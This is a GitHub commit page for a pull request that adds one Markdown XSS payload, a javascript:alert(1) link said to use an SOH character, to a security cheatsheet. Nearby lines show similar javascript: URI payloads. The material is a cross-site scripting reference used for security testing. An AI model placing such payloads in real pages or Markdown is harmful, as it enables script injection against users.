Skip to content

Commit

Permalink
Merge pull request EdOverflow#40 from tarunkant/master
Browse files Browse the repository at this point in the history
Added one payload in Markdown XSS
  • Loading branch information
EdOverflow authored Mar 6, 2018
2 parents fdc66a1 + d148279 commit 26f2820
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions cheatsheets/xss.md
Original file line number Diff line number Diff line change
Expand Up @@ -118,6 +118,10 @@ javas	cript://www.google.com/%0Aalert(1)
[a]: (javascript:prompt(1))
```
```md
[a]:(javascript:alert(1)) //Add SOH Character
```
**Flash SWF XSS**
Expand Down

0 comments on commit 26f2820

Please sign in to comment.